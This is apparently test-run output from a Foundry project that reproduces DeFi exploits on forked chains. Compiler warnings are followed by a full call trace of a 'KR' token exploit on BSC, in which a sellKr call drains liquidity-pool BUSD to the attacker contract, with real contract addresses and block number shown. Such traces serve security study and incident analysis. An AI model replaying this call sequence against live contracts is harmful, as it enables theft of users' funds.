Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 564.54ms (1.75ms CPU time)

Ran 1 test for src/test/2023-11/KR_exp.sol:ContractTest
[PASS] testExploit() (gas: 250657)
Logs:
  Attacker BUSD balance before attack: 0
  Attacker BUSD balance after attack: 15223.241888746298088968

Traces:
  [9368] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 33267984 [3.326e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], "KR")
    │   └─ ← [Return]
    ├─ [0] VM::label(BUSD: [0x55d398326f99059fF775485246999027B3197955], "BUSD")
    │   └─ ← [Return]
    └─ ← [Stop]

  [313157] ContractTest::testExploit()
    ├─ [2531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [10871] BUSD::transfer(0x000000000000000000000000000000000000dEaD, 26510000000000000000 [2.651e19])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 26510000000000000000 [2.651e19])
    │   ├─  storage changes:
    │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x00000000000000000000000000000000000000000000162ad8f424a104021923 → 0x00000000000000000000000000000000000000000000162c48da952c479d1923
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000016fe6708b439b0000 → 0
    │   └─ ← [Return] true
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Attacker BUSD balance before attack", val: 0)
    ├─ [2629] KR::balanceOf(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656) [staticcall]
    │   └─ ← [Return] 108392423293672858446138653 [1.083e26]
    ├─ [254079] KR::sellKr(101888877896052486939370333 [1.018e26])
    │   ├─ [629] KR::balanceOf(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656) [staticcall]
    │   │   └─ ← [Return] 108392423293672858446138653 [1.083e26]
    │   ├─ [2439] 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656::totalSupply() [staticcall]
    │   │   └─ ← [Return] 1436978942522210792630837 [1.436e24]
    │   ├─ [2531] BUSD::balanceOf(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12]) [staticcall]
    │   │   └─ ← [Return] 2
    │   ├─ [147275] 0x10ED43C718714eb63d5aA57B78B54704E256024E::removeLiquidity(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], BUSD: [0x55d398326f99059fF775485246999027B3197955], 1350760205970878145072986 [1.35e24], 91699990106447238245433299 [9.169e25], 0, KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], 1699309385 [1.699e9])
    │   │   ├─ [32276] 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656::transferFrom(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656, 1350760205970878145072986 [1.35e24])
    │   │   │   ├─ emit Transfer(from: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], to: 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656, value: 1350760205970878145072986 [1.35e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x390f75878d104197337b51e7e3fd99f1369cce3fbdff88abd21dbcddf86ff21c: 0x0000000000000000000000000000000000000000000130487dd355ac6304d27c → 0x00000000000000000000000000000000000000000000123fa24ecd73507b4322
    │   │   │   │   @ 0xdb0c810650d5939a94f3749620701d421ce0548a02c63206da1b3f3368e30767: 0 → 0x000000000000000000000000000000000000000000011e08db84883912898f5a
    │   │   │   └─ ← [Return] true
    │   │   ├─ [112642] 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656::burn(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12])
    │   │   │   ├─ [629] KR::balanceOf(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656) [staticcall]
    │   │   │   │   └─ ← [Return] 108392423293672858446138653 [1.083e26]
    │   │   │   ├─ [2531] BUSD::balanceOf(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656) [staticcall]
    │   │   │   │   └─ ← [Return] 19052868446490986344141 [1.905e22]
    │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   ├─ emit Transfer(from: 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656, to: 0x0000000000000000000000000000000000000000, value: 1350760205970878145072986 [1.35e24])
    │   │   │   ├─ [25974] KR::transfer(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], 101888877896052486939370274 [1.018e26])
    │   │   │   │   ├─ emit Transfer(from: 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656, to: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], value: 81511102316841989551496219 [8.151e25])
    │   │   │   │   ├─ emit Transfer(from: 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656, to: 0x000000000000000000000000000000000000dEaD, value: 20377775579210497387874054 [2.037e25])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x4de86c5e7471c0e42d74c9a957eb1c89c34208d2a41cd404a0d504dacf7b6be8: 0x00000000000000000000000000000000000000000059a8fd0a71c3ff0f170d1d → 0x00000000000000000000000000000000000000000005612de706d3709562a9fc
    │   │   │   │   │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x000000000000000000000000000000000000000000015f2c99724a4aa1fe764c → 0x000000000000000000000000000000000000000000123a5606ee1400ba55bd52
    │   │   │   │   │   @ 0xc53a8e4633ebfd6d870dd5b344accf585503b0c9802d8e342db068580e1fe2b6: 0x00000000000000000000000000000000000000001fc5edf4ee51006ce532da20 → 0x000000000000000000000000000000000000000020095a9aa4402745468ff63b
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [8871] BUSD::transfer(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], 17909696339701527163492 [1.79e22])
    │   │   │   │   ├─ emit Transfer(from: 0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656, to: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], value: 17909696339701527163492 [1.79e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdb0c810650d5939a94f3749620701d421ce0548a02c63206da1b3f3368e30767: 0x000000000000000000000000000000000000000000000408dbaa59a8ffdceecd → 0x00000000000000000000000000000000000000000000003df8b32e56f0a1bc69
    │   │   │   │   │   @ 0x390f75878d104197337b51e7e3fd99f1369cce3fbdff88abd21dbcddf86ff21c: 2 → 0x0000000000000000000000000000000000000000000003cae2f72b520f3b3266
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [629] KR::balanceOf(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656) [staticcall]
    │   │   │   │   └─ ← [Return] 6503545397620371506768380 [6.503e24]
    │   │   │   ├─ [531] BUSD::balanceOf(0xAD1e7BF0A469b7B912D2B9d766d0C93291cA2656) [staticcall]
    │   │   │   │   └─ ← [Return] 1143172106789459180649 [1.143e21]
    │   │   │   ├─ emit Sync(reserve0: 6503545397620371506768380 [6.503e24], reserve1: 1143172106789459180649 [1.143e21])
    │   │   │   ├─ emit Burn(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0: 101888877896052486939370274 [1.018e26], amount1: 17909696339701527163492 [1.79e22], to: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x65493be3000000000408dbaa59a8ffdceecd00000059a8fd0a71c3ff0f170d1d → 0x6549674900000000003df8b32e56f0a1bc6900000005612de706d3709562a9fc
    │   │   │   │   @ 11: 0x00000000000000000000000169be2b4c3186d9d17fc5c4660f7bb12dab927639 → 0x000000000000000000000000014d61d870d17bde73430f602fd23bf2e1c8c85c
    │   │   │   │   @ 10: 0x00000000000000000000000000004a397660077aecb9b99d62c2e1b288f81417 → 0x00000000000000000000000000004dfde593cb8a02c9dc08d83a1253118b2495
    │   │   │   │   @ 0xdb0c810650d5939a94f3749620701d421ce0548a02c63206da1b3f3368e30767: 0x000000000000000000000000000000000000000000011e08db84883912898f5a → 0
    │   │   │   │   @ 9: 0x00000000000000000000000000000000001c6da360a2d8f74226a81fc01a81d7 → 0x00000000000000000000000000000000001e61934e039de771499e127c985541
    │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000001304ac8d93f3744bdea35 → 0x000000000000000000000000000000000000000000001241ed54b6fe32345adb
    │   │   │   └─ ← [Return] 101888877896052486939370274 [1.018e26], 17909696339701527163492 [1.79e22]
    │   │   └─ ← [Return] 101888877896052486939370274 [1.018e26], 17909696339701527163492 [1.79e22]
    │   ├─ [531] BUSD::balanceOf(KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12]) [staticcall]
    │   │   └─ ← [Return] 17909696339701527163494 [1.79e22]
    │   ├─ [3271] BUSD::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 15223241888746298088968 [1.522e22])
    │   │   ├─ emit Transfer(from: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 15223241888746298088968 [1.522e22])
    │   │   ├─  storage changes:
    │   │   │   @ 0x390f75878d104197337b51e7e3fd99f1369cce3fbdff88abd21dbcddf86ff21c: 0x0000000000000000000000000000000000000000000003cae2f72b520f3b3266 → 0x000000000000000000000000000000000000000000000091a20b79b2b57c145e
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000033940ebb19f59bf1e08
    │   │   └─ ← [Return] true
    │   ├─ [8071] BUSD::transfer(0xA11c1C398b3B5C5718Ed9A8A56f65625D612D7F6, 897275786619046510891 [8.972e20])
    │   │   ├─ emit Transfer(from: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], to: 0xA11c1C398b3B5C5718Ed9A8A56f65625D612D7F6, value: 897275786619046510891 [8.972e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe2a8467bd7ee6c802d1ec29714fbb5e05fa7aa971267516c5187b5d841728885: 0x00000000000000000000000000000000000000000000000ad7cd4f21818ae020 → 0x00000000000000000000000000000000000000000000003b7c0145170d01a14b
    │   │   │   @ 0x390f75878d104197337b51e7e3fd99f1369cce3fbdff88abd21dbcddf86ff21c: 0x000000000000000000000000000000000000000000000091a20b79b2b57c145e → 0x000000000000000000000000000000000000000000000060fdd783bd2a055333
    │   │   └─ ← [Return] true
    │   ├─ [8071] BUSD::transfer(0x44A07c78C9C515dC05faE48bc85ab6a5C1B12fB3, 1789178664336182563632 [1.789e21])
    │   │   ├─ emit Transfer(from: KR: [0x15b1Ed79cA9D7955AF3E169d7B323c4F1eeb5D12], to: 0x44A07c78C9C515dC05faE48bc85ab6a5C1B12fB3, value: 1789178664336182563632 [1.789e21])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3d1019d2f60ca7e29a770d382deaee8e3e3aed39b75e48608a5957addd9a4e16: 0x000000000000000000000000000000000000000000000002b66074b86dc248da → 0x000000000000000000000000000000000000000000000063b437f87597c79c0a
    │   │   │   @ 0x390f75878d104197337b51e7e3fd99f1369cce3fbdff88abd21dbcddf86ff21c: 0x000000000000000000000000000000000000000000000060fdd783bd2a055333 → 3
    │   │   └─ ← [Return] true
    │   ├─  emit topic 0: 0x0f2f8766c626e6799a3584b5936bf34d96d303c9fdfd1ed146d4caddb2298725
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │           data: 0x00000000000000000000000000000000000000000000033940ebb19f59bf1e08000000000000000000000000000000000000000000000030a433f5f58b76c12b
    │   ├─  storage changes:
    │   │   @ 12: 0 → 1
    │   │   @ 0x3d1019d2f60ca7e29a770d382deaee8e3e3aed39b75e48608a5957addd9a4e16: 0x000000000000000000000000000000000000000000000002b66074b86dc248da → 0x000000000000000000000000000000000000000000000063b437f87597c79c0a
    │   └─ ← [Return] 0x00000000000000000000000000000000000000000000033940ebb19f59bf1e08
    ├─ [531] BUSD::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 15223241888746298088968 [1.522e22]
    ├─ emit log_named_decimal_uint(key: "Attacker BUSD balance after attack", val: 15223241888746298088968 [1.522e22], decimals: 18)
    ├─  storage changes:
    │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x00000000000000000000000000000000000000000000162ad8f424a104021923 → 0x00000000000000000000000000000000000000000000162c48da952c479d1923
    │   @ 17: 1 → 0
    │   @ 34: 0 → 0x0000000000000000000000000000000000000000005447cf236af08e79b4635d
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.70s (10.43s CPU time)

Ran 2 test suites in 12.53s (12.27s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
